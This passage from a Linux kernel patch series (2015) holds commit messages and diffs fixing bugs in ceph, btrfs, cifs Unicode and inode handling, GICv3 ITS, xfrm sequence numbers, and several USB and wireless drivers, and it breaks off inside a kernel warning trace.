osdmap if lingering request maps to no osd" Signed-off-by: Ilya Dryomov Reviewed-by: Sage Weil --- net/ceph/osd_client.c | 2 -- 1 file changed, 2 deletions(-) diff --git a/net/ceph/osd_client.c b/net/ceph/osd_client.c index 31d4b1ebff01..c4ec9239249a 100644 --- a/net/ceph/osd_client.c +++ b/net/ceph/osd_client.c @@ -1306,8 +1306,6 @@ static void __unregister_linger_request(struct ceph_osd_client *osdc, if (list_empty(&req->r_osd_item)) req->r_osd = NULL; } - - list_del_init(&req->r_req_lru_item); /* can be on notarget */ ceph_osdc_put_request(req); } From 153c35b6cccc0c72de9fae06c8e2c8b2c47d79d4 Mon Sep 17 00:00:00 2001 From: Chris Mason Date: Tue, 19 May 2015 18:54:41 -0700 Subject: [PATCH 139/872] Btrfs: fix regression in raid level conversion Commit 2f0810880f082fa8ba66ab2c33b02e4ff9770a5e changed btrfs_set_block_group_ro to avoid trying to allocate new chunks with the new raid profile during conversion. This fixed failures when there was no space on the drive to allocate a new chunk, but the metadata reserves were sufficient to continue the conversion. But this ended up causing a regression when the drive had plenty of space to allocate new chunks, mostly because reduce_alloc_profile isn't using the new raid profile. Fixing btrfs_reduce_alloc_profile is a bigger patch. For now, do a partial revert of 2f0810880, and don't error out if we hit ENOSPC. Signed-off-by: Chris Mason Tested-by: Dave Sterba Reported-by: Holger Hoffstaette --- fs/btrfs/extent-tree.c | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c index 45e3f086790b..0ec3acd14cbf 100644 --- a/fs/btrfs/extent-tree.c +++ b/fs/btrfs/extent-tree.c @@ -8829,6 +8829,24 @@ int btrfs_set_block_group_ro(struct btrfs_root *root, goto again; } + /* + * if we are changing raid levels, try to allocate a corresponding + * block group with the new raid level. + */ + alloc_flags = update_block_group_flags(root, cache->flags); + if (alloc_flags != cache->flags) { + ret = do_chunk_alloc(trans, root, alloc_flags, + CHUNK_ALLOC_FORCE); + /* + * ENOSPC is allowed here, we may have enough space + * already allocated at the new raid level to + * carry on + */ + if (ret == -ENOSPC) + ret = 0; + if (ret < 0) + goto out; + } ret = set_block_group_ro(cache, 0); if (!ret) From 7196ac113a4f38b7ca1a3282fd9edf328bd22287 Mon Sep 17 00:00:00 2001 From: Nakajima Akira Date: Wed, 22 Apr 2015 15:24:44 +0900 Subject: [PATCH 140/872] Fix to check Unique id and FileType when client refer file directly. When you refer file directly on cifs client, (e.g. ls -li , cd , stat ) the function return old inode number and filetype from old inode cache, though server has different inode number or filetype. When server is Windows, cifs client has same problem. When Server is Windows , This patch fixes bug in different filetype, but does not fix bug in different inode number. Because QUERY_PATH_INFO response by Windows does not include inode number(Index Number) . BUG INFO https://bugzilla.kernel.org/show_bug.cgi?id=90021 https://bugzilla.kernel.org/show_bug.cgi?id=90031 Reported-by: Nakajima Akira Signed-off-by: Nakajima Akira Reviewed-by: Shirish Pargaonkar Signed-off-by: Steve French --- fs/cifs/inode.c | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c index ef71aa1515f6..f621b44cb800 100644 --- a/fs/cifs/inode.c +++ b/fs/cifs/inode.c @@ -401,9 +401,25 @@ int cifs_get_inode_info_unix(struct inode **pinode, rc = -ENOMEM; } else { /* we already have inode, update it */ + + /* if uniqueid is different, return error */ + if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM && + CIFS_I(*pinode)->uniqueid != fattr.cf_uniqueid)) { + rc = -ESTALE; + goto cgiiu_exit; + } + + /* if filetype is different, return error */ + if (unlikely(((*pinode)->i_mode & S_IFMT) != + (fattr.cf_mode & S_IFMT))) { + rc = -ESTALE; + goto cgiiu_exit; + } + cifs_fattr_to_inode(*pinode, &fattr); } +cgiiu_exit: return rc; } @@ -838,6 +854,15 @@ cifs_get_inode_info(struct inode **inode, const char *full_path, if (!*inode) rc = -ENOMEM; } else { + /* we already have inode, update it */ + + /* if filetype is different, return error */ + if (unlikely(((*inode)->i_mode & S_IFMT) != + (fattr.cf_mode & S_IFMT))) { + rc = -ESTALE; + goto cgii_exit; + } + cifs_fattr_to_inode(*inode, &fattr); } From 00b8c95b680791a72b4bb14dc371ff1f1daae39c Mon Sep 17 00:00:00 2001 From: Chengyu Song Date: Tue, 24 Mar 2015 20:18:49 -0400 Subject: [PATCH 141/872] cifs: potential missing check for posix_lock_file_wait posix_lock_file_wait may fail under certain circumstances, and its result is usually checked/returned. But given the complexity of cifs, I'm not sure if the result is intentially left unchecked and always expected to succeed. Signed-off-by: Chengyu Song Acked-by: Jeff Layton Signed-off-by: Steve French --- fs/cifs/file.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fs/cifs/file.c b/fs/cifs/file.c index 5cfa7129d876..3f50cee79df9 100644 --- a/fs/cifs/file.c +++ b/fs/cifs/file.c @@ -1552,8 +1552,8 @@ cifs_setlk(struct file *file, struct file_lock *flock, __u32 type, rc = server->ops->mand_unlock_range(cfile, flock, xid); out: - if (flock->fl_flags & FL_POSIX) - posix_lock_file_wait(file, flock); + if (flock->fl_flags & FL_POSIX && !rc) + rc = posix_lock_file_wait(file, flock); return rc; } From b29103076bec8316e155e71309dc0fba499022c6 Mon Sep 17 00:00:00 2001 From: Nakajima Akira Date: Thu, 9 Apr 2015 17:27:39 +0900 Subject: [PATCH 142/872] Fix to convert SURROGATE PAIR Garbled characters happen by using surrogate pair for filename. (replace each 1 character to ??) [Steps to Reproduce for bug] client# touch $(echo -e '\xf0\x9d\x9f\xa3') client# touch $(echo -e '\xf0\x9d\x9f\xa4') client# ls -li You see same inode number, same filename(=?? and ??) . Fix the bug about these functions do not consider about surrogate pair (and IVS). cifs_utf16_bytes() cifs_mapchar() cifs_from_utf16() cifsConvertToUTF16() Reported-by: Nakajima Akira Signed-off-by: Nakajima Akira Signed-off-by: Steve French --- fs/cifs/cifs_unicode.c | 182 ++++++++++++++++++++++++++++++----------- 1 file changed, 136 insertions(+), 46 deletions(-) diff --git a/fs/cifs/cifs_unicode.c b/fs/cifs/cifs_unicode.c index 0303c6793d90..5a53ac6b1e02 100644 --- a/fs/cifs/cifs_unicode.c +++ b/fs/cifs/cifs_unicode.c @@ -27,41 +27,6 @@ #include "cifsglob.h" #include "cifs_debug.h" -/* - * cifs_utf16_bytes - how long will a string be after conversion? - * @utf16 - pointer to input string - * @maxbytes - don't go past this many bytes of input string - * @codepage - destination codepage - * - * Walk a utf16le string and return the number of bytes that the string will - * be after being converted to the given charset, not including any null - * termination required. Don't walk past maxbytes in the source buffer. - */ -int -cifs_utf16_bytes(const __le16 *from, int maxbytes, - const struct nls_table *codepage) -{ - int i; - int charlen, outlen = 0; - int maxwords = maxbytes / 2; - char tmp[NLS_MAX_CHARSET_SIZE]; - __u16 ftmp; - - for (i = 0; i < maxwords; i++) { - ftmp = get_unaligned_le16(&from[i]); - if (ftmp == 0) - break; - - charlen = codepage->uni2char(ftmp, tmp, NLS_MAX_CHARSET_SIZE); - if (charlen > 0) - outlen += charlen; - else - outlen++; - } - - return outlen; -} - int cifs_remap(struct cifs_sb_info *cifs_sb) { int map_type; @@ -155,10 +120,13 @@ convert_sfm_char(const __u16 src_char, char *target) * enough to hold the result of the conversion (at least NLS_MAX_CHARSET_SIZE). */ static int -cifs_mapchar(char *target, const __u16 src_char, const struct nls_table *cp, +cifs_mapchar(char *target, const __u16 *from, const struct nls_table *cp, int maptype) { int len = 1; + __u16 src_char; + + src_char = *from; if ((maptype == SFM_MAP_UNI_RSVD) && convert_sfm_char(src_char, target)) return len; @@ -168,10 +136,23 @@ cifs_mapchar(char *target, const __u16 src_char, const struct nls_table *cp, /* if character not one of seven in special remap set */ len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE); - if (len <= 0) { - *target = '?'; - len = 1; - } + if (len <= 0) + goto surrogate_pair; + + return len; + +surrogate_pair: + /* convert SURROGATE_PAIR and IVS */ + if (strcmp(cp->charset, "utf8")) + goto unknown; + len = utf16s_to_utf8s(from, 3, UTF16_LITTLE_ENDIAN, target, 6); + if (len <= 0) + goto unknown; + return len; + +unknown: + *target = '?'; + len = 1; return len; } @@ -206,7 +187,7 @@ cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen, int nullsize = nls_nullsize(codepage); int fromwords = fromlen / 2; char tmp[NLS_MAX_CHARSET_SIZE]; - __u16 ftmp; + __u16 ftmp[3]; /* ftmp[3] = 3array x 2bytes = 6bytes UTF-16 */ /* * because the chars can be of varying widths, we need to take care @@ -217,9 +198,17 @@ cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen, safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize); for (i = 0; i < fromwords; i++) { - ftmp = get_unaligned_le16(&from[i]); - if (ftmp == 0) + ftmp[0] = get_unaligned_le16(&from[i]); + if (ftmp[0] == 0) break; + if (i + 1 < fromwords) + ftmp[1] = get_unaligned_le16(&from[i + 1]); + else + ftmp[1] = 0; + if (i + 2 < fromwords) + ftmp[2] = get_unaligned_le16(&from[i + 2]); + else + ftmp[2] = 0; /* * check to see if converting this character might make the @@ -234,6 +223,17 @@ cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen, /* put converted char into 'to' buffer */ charlen = cifs_mapchar(&to[outlen], ftmp, codepage, map_type); outlen += charlen; + + /* charlen (=bytes of UTF-8 for 1 character) + * 4bytes UTF-8(surrogate pair) is charlen=4 + * (4bytes UTF-16 code) + * 7-8bytes UTF-8(IVS) is charlen=3+4 or 4+4 + * (2 UTF-8 pairs divided to 2 UTF-16 pairs) */ + if (charlen == 4) + i++; + else if (charlen >= 5) + /* 5-6bytes UTF-8 */ + i += 2; } /* properly null-terminate string */ @@ -295,6 +295,46 @@ cifs_strtoUTF16(__le16 *to, const char *from, int len, return i; } +/* + * cifs_utf16_bytes - how long will a string be after conversion? + * @utf16 - pointer to input string + * @maxbytes - don't go past this many bytes of input string + * @codepage - destination codepage + * + * Walk a utf16le string and return the number of bytes that the string will + * be after being converted to the given charset, not including any null + * termination required. Don't walk past maxbytes in the source buffer. + */ +int +cifs_utf16_bytes(const __le16 *from, int maxbytes, + const struct nls_table *codepage) +{ + int i; + int charlen, outlen = 0; + int maxwords = maxbytes / 2; + char tmp[NLS_MAX_CHARSET_SIZE]; + __u16 ftmp[3]; + + for (i = 0; i < maxwords; i++) { + ftmp[0] = get_unaligned_le16(&from[i]); + if (ftmp[0] == 0) + break; + if (i + 1 < maxwords) + ftmp[1] = get_unaligned_le16(&from[i + 1]); + else + ftmp[1] = 0; + if (i + 2 < maxwords) + ftmp[2] = get_unaligned_le16(&from[i + 2]); + else + ftmp[2] = 0; + + charlen = cifs_mapchar(tmp, ftmp, codepage, NO_MAP_UNI_RSVD); + outlen += charlen; + } + + return outlen; +} + /* * cifs_strndup_from_utf16 - copy a string from wire format to the local * codepage @@ -409,10 +449,15 @@ cifsConvertToUTF16(__le16 *target, const char *source, int srclen, char src_char; __le16 dst_char; wchar_t tmp; + wchar_t *wchar_to; /* UTF-16 */ + int ret; + unicode_t u; if (map_chars == NO_MAP_UNI_RSVD) return cifs_strtoUTF16(target, source, PATH_MAX, cp); + wchar_to = kzalloc(6, GFP_KERNEL); + for (i = 0; i < srclen; j++) { src_char = source[i]; charlen = 1; @@ -441,11 +486,55 @@ cifsConvertToUTF16(__le16 *target, const char *source, int srclen, * if no match, use question mark, which at least in * some cases serves as wild card */ - if (charlen < 1) { - dst_char = cpu_to_le16(0x003f); - charlen = 1; + if (charlen > 0) + goto ctoUTF16; + + /* convert SURROGATE_PAIR */ + if (strcmp(cp->charset, "utf8") || !wchar_to) + goto unknown; + if (*(source + i) & 0x80) { + charlen = utf8_to_utf32(source + i, 6, &u); + if (charlen < 0) + goto unknown; + } else + goto unknown; + ret = utf8s_to_utf16s(source + i, charlen, + UTF16_LITTLE_ENDIAN, + wchar_to, 6); + if (ret < 0) + goto unknown; + + i += charlen; + dst_char = cpu_to_le16(*wchar_to); + if (charlen <= 3) + /* 1-3bytes UTF-8 to 2bytes UTF-16 */ + put_unaligned(dst_char, &target[j]); + else if (charlen == 4) { + /* 4bytes UTF-8(surrogate pair) to 4bytes UTF-16 + * 7-8bytes UTF-8(IVS) divided to 2 UTF-16 + * (charlen=3+4 or 4+4) */ + put_unaligned(dst_char, &target[j]); + dst_char = cpu_to_le16(*(wchar_to + 1)); + j++; + put_unaligned(dst_char, &target[j]); + } else if (charlen >= 5) { + /* 5-6bytes UTF-8 to 6bytes UTF-16 */ + put_unaligned(dst_char, &target[j]); + dst_char = cpu_to_le16(*(wchar_to + 1)); + j++; + put_unaligned(dst_char, &target[j]); + dst_char = cpu_to_le16(*(wchar_to + 2)); + j++; + put_unaligned(dst_char, &target[j]); } + continue; + +unknown: + dst_char = cpu_to_le16(0x003f); + charlen = 1; } + +ctoUTF16: /* * character may take more than one byte in the source string, * but will take exactly two bytes in the target string @@ -456,6 +545,7 @@ cifsConvertToUTF16(__le16 *target, const char *source, int srclen, ctoUTF16_out: put_unaligned(0, &target[j]); /* Null terminate target unicode string */ + kfree(wchar_to); return j; } From 4afe260bab50290a05e5732570329a530ed023f3 Mon Sep 17 00:00:00 2001 From: Federico Sauter Date: Tue, 17 Mar 2015 17:45:28 +0100 Subject: [PATCH 143/872] CIFS: Fix race condition on RFC1002_NEGATIVE_SESSION_RESPONSE This patch fixes a race condition that occurs when connecting to a NT 3.51 host without specifying a NetBIOS name. In that case a RFC1002_NEGATIVE_SESSION_RESPONSE is received and the SMB negotiation is reattempted, but under some conditions it leads SendReceive() to hang forever while waiting for srv_mutex. This, in turn, sets the calling process to an uninterruptible sleep state and makes it unkillable. The solution is to unlock the srv_mutex acquired in the demux thread *before* going to sleep (after the reconnect error) and before reattempting the connection. --- fs/cifs/connect.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c index f3bfe08e177b..8383d5ea4202 100644 --- a/fs/cifs/connect.c +++ b/fs/cifs/connect.c @@ -386,6 +386,7 @@ cifs_reconnect(struct TCP_Server_Info *server) rc = generic_ip_connect(server); if (rc) { cifs_dbg(FYI, "reconnect error %d\n", rc); + mutex_unlock(&server->srv_mutex); msleep(3000); } else { atomic_inc(&tcpSesReconnectCount); @@ -393,8 +394,8 @@ cifs_reconnect(struct TCP_Server_Info *server) if (server->tcpStatus != CifsExiting) server->tcpStatus = CifsNeedNegotiate; spin_unlock(&GlobalMid_Lock); + mutex_unlock(&server->srv_mutex); } - mutex_unlock(&server->srv_mutex); } while (server->tcpStatus == CifsNeedReconnect); return rc; From 3ad2a5f57656a14d964b673a5a0e4ab0e583c870 Mon Sep 17 00:00:00 2001 From: Minghuan Lian Date: Wed, 20 May 2015 10:13:15 -0500 Subject: [PATCH 144/872] irqchip/gicv3-its: ITS table size should not be smaller than PSZ When allocating a device table, if the requested allocation is smaller than the default granule size of the ITS then, we need to round up to the default size. Signed-off-by: Minghuan Lian [ stuart: Added comments and massaged changelog ] Signed-off-by: Stuart Yoder Reviewed-by: Marc Zygnier Cc: Cc: Link: http://lkml.kernel.org/r/1432134795-661-1-git-send-email-stuart.yoder@freescale.com Signed-off-by: Thomas Gleixner --- drivers/irqchip/irq-gic-v3-its.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c index 9687f8afebff..1b7e155869f6 100644 --- a/drivers/irqchip/irq-gic-v3-its.c +++ b/drivers/irqchip/irq-gic-v3-its.c @@ -828,7 +828,14 @@ static int its_alloc_tables(struct its_node *its) u64 typer = readq_relaxed(its->base + GITS_TYPER); u32 ids = GITS_TYPER_DEVBITS(typer); - order = get_order((1UL << ids) * entry_size); + /* + * 'order' was initialized earlier to the default page + * granule of the the ITS. We can't have an allocation + * smaller than that. If the requested allocation + * is smaller, round up to the default page granule. + */ + order = max(get_order((1UL << ids) * entry_size), + order); if (order >= MAX_ORDER) { order = MAX_ORDER - 1; pr_warn("%s: Device Table too large, reduce its page order to %u\n", From 407d34ef294727bdc200934c38d9a8241f4a5547 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 21 May 2015 00:38:12 +0800 Subject: [PATCH 145/872] xfrm: Always zero high-order sequence number bits As we're now always including the high bits of the sequence number in the IV generation process we need to ensure that they don't contain crap. This patch ensures that the high sequence bits are always zeroed so that we don't leak random data into the IV. Signed-off-by: Herbert Xu Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_replay.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/net/xfrm/xfrm_replay.c b/net/xfrm/xfrm_replay.c index dab57daae408..4fd725a0c500 100644 --- a/net/xfrm/xfrm_replay.c +++ b/net/xfrm/xfrm_replay.c @@ -99,6 +99,7 @@ static int xfrm_replay_overflow(struct xfrm_state *x, struct sk_buff *skb) if (x->type->flags & XFRM_TYPE_REPLAY_PROT) { XFRM_SKB_CB(skb)->seq.output.low = ++x->replay.oseq; + XFRM_SKB_CB(skb)->seq.output.hi = 0; if (unlikely(x->replay.oseq == 0)) { x->replay.oseq--; xfrm_audit_state_replay_overflow(x, skb); @@ -177,6 +178,7 @@ static int xfrm_replay_overflow_bmp(struct xfrm_state *x, struct sk_buff *skb) if (x->type->flags & XFRM_TYPE_REPLAY_PROT) { XFRM_SKB_CB(skb)->seq.output.low = ++replay_esn->oseq; + XFRM_SKB_CB(skb)->seq.output.hi = 0; if (unlikely(replay_esn->oseq == 0)) { replay_esn->oseq--; xfrm_audit_state_replay_overflow(x, skb); From 1df5b888f54070a373a73b34488cc78c2365b7b4 Mon Sep 17 00:00:00 2001 From: Patrick Riphagen Date: Tue, 19 May 2015 10:03:01 +0200 Subject: [PATCH 146/872] USB: serial: ftdi_sio: Add support for a Motion Tracker Development Board This adds support for new Xsens device, Motion Tracker Development Board, using Xsens' own Vendor ID Signed-off-by: Patrick Riphagen Cc: stable@vger.kernel.org Signed-off-by: Johan Hovold --- drivers/usb/serial/ftdi_sio.c | 1 + drivers/usb/serial/ftdi_sio_ids.h | 1 + 2 files changed, 2 insertions(+) diff --git a/drivers/usb/serial/ftdi_sio.c b/drivers/usb/serial/ftdi_sio.c index 8eb68a31cab6..4c8b3b82103d 100644 --- a/drivers/usb/serial/ftdi_sio.c +++ b/drivers/usb/serial/ftdi_sio.c @@ -699,6 +699,7 @@ static const struct usb_device_id id_table_combined[] = { { USB_DEVICE(XSENS_VID, XSENS_AWINDA_DONGLE_PID) }, { USB_DEVICE(XSENS_VID, XSENS_AWINDA_STATION_PID) }, { USB_DEVICE(XSENS_VID, XSENS_CONVERTER_PID) }, + { USB_DEVICE(XSENS_VID, XSENS_MTDEVBOARD_PID) }, { USB_DEVICE(XSENS_VID, XSENS_MTW_PID) }, { USB_DEVICE(FTDI_VID, FTDI_OMNI1509) }, { USB_DEVICE(MOBILITY_VID, MOBILITY_USB_SERIAL_PID) }, diff --git a/drivers/usb/serial/ftdi_sio_ids.h b/drivers/usb/serial/ftdi_sio_ids.h index 4e4f46f3c89c..792e054126de 100644 --- a/drivers/usb/serial/ftdi_sio_ids.h +++ b/drivers/usb/serial/ftdi_sio_ids.h @@ -155,6 +155,7 @@ #define XSENS_AWINDA_STATION_PID 0x0101 #define XSENS_AWINDA_DONGLE_PID 0x0102 #define XSENS_MTW_PID 0x0200 /* Xsens MTw */ +#define XSENS_MTDEVBOARD_PID 0x0300 /* Motion Tracker Development Board */ #define XSENS_CONVERTER_PID 0xD00D /* Xsens USB-serial converter */ /* Xsens devices using FTDI VID */ From 33a238ae65cee561b3eb78694a41cd3e196fe59c Mon Sep 17 00:00:00 2001 From: Stefan Schmidt Date: Thu, 21 May 2015 16:51:35 +0200 Subject: [PATCH 147/872] ieee802154/atusb: Warn about outdated device firmware. Together with mainlining the driver we released a first public binary version of the device firmware. This is version 0.2. With this change we warn users who run outdated versions of the firmware. While we have not seen problems with it yet (thus no error, but a warning only) it would be better to run the released and tested firmware. You can find released versions here: http://downloads.qi-hardware.com/people/werner/wpan/web/ Signed-off-by: Stefan Schmidt Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/atusb.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/drivers/net/ieee802154/atusb.c b/drivers/net/ieee802154/atusb.c index ea1259ef8508..9d07dd720bbb 100644 --- a/drivers/net/ieee802154/atusb.c +++ b/drivers/net/ieee802154/atusb.c @@ -469,6 +469,12 @@ static int atusb_get_and_show_revision(struct atusb *atusb) dev_info(&usb_dev->dev, "Firmware: major: %u, minor: %u, hardware type: %u\n", buffer[0], buffer[1], buffer[2]); + if (buffer[0] == 0 && buffer[1] < 2) { + dev_info(&usb_dev->dev, + "Firmware version (%u.%u) is predates our first public release.", + buffer[0], buffer[1]); + dev_info(&usb_dev->dev, "Please update to version 0.2 or newer"); + } return ret; } From f1a71886c59f1d981d3848c744e617d2f7e4149e Mon Sep 17 00:00:00 2001 From: Stefan Schmidt Date: Thu, 21 May 2015 16:51:36 +0200 Subject: [PATCH 148/872] ieee802154/atusb: Mark driver as AACK enabled in hardware. Since firmware version 0.2 we use AACK handling directly in the firmware. Inform the stack that the hardware supports and uses it. Signed-off-by: Stefan Schmidt Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/atusb.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/atusb.c b/drivers/net/ieee802154/atusb.c index 9d07dd720bbb..eef1d8aa0269 100644 --- a/drivers/net/ieee802154/atusb.c +++ b/drivers/net/ieee802154/atusb.c @@ -568,7 +568,8 @@ static int atusb_probe(struct usb_interface *interface, goto fail; hw->parent = &usb_dev->dev; - hw->flags = IEEE802154_HW_TX_OMIT_CKSUM | IEEE802154_HW_AFILT; + hw->flags = IEEE802154_HW_TX_OMIT_CKSUM | IEEE802154_HW_AFILT | + IEEE802154_HW_AACK; hw->phy->current_page = 0; hw->phy->current_channel = 11; /* reset default */ From 2d8cbd31dd5d4fe7825e1ab88f39c283849db946 Mon Sep 17 00:00:00 2001 From: Stefan Schmidt Date: Thu, 21 May 2015 16:51:37 +0200 Subject: [PATCH 149/872] ieee802154/atusb: Set default ed level to 0xbe like the rest of these drivers Signed-off-by: Stefan Schmidt Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/atusb.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ieee802154/atusb.c b/drivers/net/ieee802154/atusb.c index eef1d8aa0269..1e18774240b2 100644 --- a/drivers/net/ieee802154/atusb.c +++ b/drivers/net/ieee802154/atusb.c @@ -365,8 +365,8 @@ static int atusb_channel(struct ieee802154_hw *hw, u8 page, u8 channel) static int atusb_ed(struct ieee802154_hw *hw, u8 *level) { - /* @@@ not used by the stack yet */ - *level = 0; + BUG_ON(!level); + *level = 0xbe; return 0; } From 2fc863a5143d64b8f06576cc3d7fd5622c5cf3b5 Mon Sep 17 00:00:00 2001 From: Haim Dreyfuss Date: Wed, 20 May 2015 08:10:43 +0300 Subject: [PATCH 150/872] iwlwifi: mvm: Free fw_status after use to avoid memory leak fw_status is the only pointer pointing to a block of memory allocated above and should be freed after use. Note: this come from Klockwork static analyzer. Cc: stable@vger.kernel.org [3.19+] Fixes: 2021a89d7b8a ("iwlwifi: mvm: treat netdetect wake up separately") Signed-off-by: Haim Dreyfuss Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index 1b1b2bf26819..42dadaf5e24d 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -1750,8 +1750,10 @@ static void iwl_mvm_query_netdetect_reasons(struct iwl_mvm *mvm, int i, j, n_matches, ret; fw_status = iwl_mvm_get_wakeup_status(mvm, vif); - if (!IS_ERR_OR_NULL(fw_status)) + if (!IS_ERR_OR_NULL(fw_status)) { reasons = le32_to_cpu(fw_status->wakeup_reasons); + kfree(fw_status); + } if (reasons & IWL_WOWLAN_WAKEUP_BY_RFKILL_DEASSERTED) wakeup.rfkill_release = true; From 18f84673fb0fb3b4727ecf53a7455874172899d4 Mon Sep 17 00:00:00 2001 From: Liad Kaufman Date: Wed, 20 May 2015 15:50:07 +0300 Subject: [PATCH 151/872] iwlwifi: nvm: force mac from otp in case nvm mac is reserved Take the MAC address from the OTP even if one is present in the NVM, if that MAC address happens to be a reserved one. Signed-off-by: Liad Kaufman Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-nvm-parse.c | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c index cf86f3cdbb8e..75e96db6626b 100644 --- a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c +++ b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c @@ -533,6 +533,10 @@ static void iwl_set_hw_address_family_8000(struct device *dev, const u8 *hw_addr; if (mac_override) { + static const u8 reserved_mac[] = { + 0x02, 0xcc, 0xaa, 0xff, 0xee, 0x00 + }; + hw_addr = (const u8 *)(mac_override + MAC_ADDRESS_OVERRIDE_FAMILY_8000); @@ -544,7 +548,12 @@ static void iwl_set_hw_address_family_8000(struct device *dev, data->hw_addr[4] = hw_addr[5]; data->hw_addr[5] = hw_addr[4]; - if (is_valid_ether_addr(data->hw_addr)) + /* + * Force the use of the OTP MAC address in case of reserved MAC + * address in the NVM, or if address is given but invalid. + */ + if (is_valid_ether_addr(data->hw_addr) && + memcmp(reserved_mac, hw_addr, ETH_ALEN) != 0) return; IWL_ERR_DEV(dev, From 165b3c4f78ca72bd83bf6abd9ecc472c09f444d3 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Mon, 4 May 2015 11:20:52 +0300 Subject: [PATCH 152/872] iwlwifi: mvm: BT Coex - duplicate the command if sent ASYNC There are buses that can't handle ASYNC command without copying them. Duplicate the host command instead. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/coex_legacy.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/coex_legacy.c b/drivers/net/wireless/iwlwifi/mvm/coex_legacy.c index d954591e0be5..6ac6de2af977 100644 --- a/drivers/net/wireless/iwlwifi/mvm/coex_legacy.c +++ b/drivers/net/wireless/iwlwifi/mvm/coex_legacy.c @@ -776,7 +776,7 @@ static int iwl_mvm_bt_coex_reduced_txp(struct iwl_mvm *mvm, u8 sta_id, struct iwl_host_cmd cmd = { .id = BT_CONFIG, .len = { sizeof(*bt_cmd), }, - .dataflags = { IWL_HCMD_DFL_NOCOPY, }, + .dataflags = { IWL_HCMD_DFL_DUP, }, .flags = CMD_ASYNC, }; struct iwl_mvm_sta *mvmsta; From dcfc7fb134afc3b8e3d1070ef6a6d6faa9d383ef Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 28 Apr 2015 08:41:55 +0300 Subject: [PATCH 153/872] iwlwifi: mvm: take the UCODE_DOWN reference when resuming The __iwl_mvm_resume() function always returns 1, which causes mac80211 to do a reconfig with IEEE80211_RECONFIG_TYPE_RESTART. This type of reconfig calls iwl_mvm_restart_complete(), where we unref the IWL_MVM_REF_UCODE_DOWN, so we should always take the reference in this case. This prevents this kind of warning from happening: [40026.103025] WARNING: at /root/iwlwifi/iwlwifi-stack-dev/drivers/net/wireless/iwlwifi/mvm/mac80211.c:236 iwl_mvm_unref+0xc9/0xd0 [iwlmvm]() [40026.105145] Modules linked in: iwlmvm(O) iwlwifi(O) mac80211(O) cfg80211(O) compat(O) ctr ccm arc4 autofs4 snd_hda_codec_hdmi snd_hda_codec_idt joydev coretemp kvm_intel kvm aesni_intel ablk_helper cryptd lrw aes_i586 snd_hda_intel xts snd_hda_codec gf128mul snd_hwdep snd_pcm snd_seq_midi dell_wmi snd_rawmidi sparse_keymap snd_seq_midi_event snd_seq uvcvideo dell_laptop videobuf2_core dcdbas microcode videodev psmouse snd_timer videobuf2_vmalloc videobuf2_memops serio_raw snd_seq_device btusb i915 snd bluetooth lpc_ich drm_kms_helper soundcore snd_page_alloc drm i2c_algo_bit wmi parport_pc ppdev video binfmt_misc rpcsec_gss_krb5 nfsd mac_hid nfs_acl nfsv4 auth_rpcgss nfs fscache lockd sunrpc msdos lp parport sdhci_pci sdhci ahci libahci e1000e mmc_core ptp pps_core [last unloaded: compat] [40026.117640] CPU: 2 PID: 3827 Comm: bash Tainted: G W O 3.10.29-dev #1 [40026.120216] Hardware name: Dell Inc. Latitude E6430/0CPWYR, BIOS A09 12/13/2012 [40026.122815] f8effd18 f8effd18 e740fd18 c168aa62 e740fd40 c103a824 c1871238 f8effd18 [40026.125527] 000000ec f8ec79c9 f8ec79c9 d5d29ba4 d5d2a20c 00000000 e740fd50 c103a862 [40026.128209] 00000009 00000000 e740fd7c f8ec79c9 f1c591c4 00000400 00000000 f8efb490 [40026.130886] Call Trace: [40026.133506] [] dump_stack+0x16/0x18 [40026.136115] [] warn_slowpath_common+0x64/0x80 [40026.138727] [] ? iwl_mvm_unref+0xc9/0xd0 [iwlmvm] [40026.141319] [] ? iwl_mvm_unref+0xc9/0xd0 [iwlmvm] [40026.143881] [] warn_slowpath_null+0x22/0x30 [40026.146453] [] 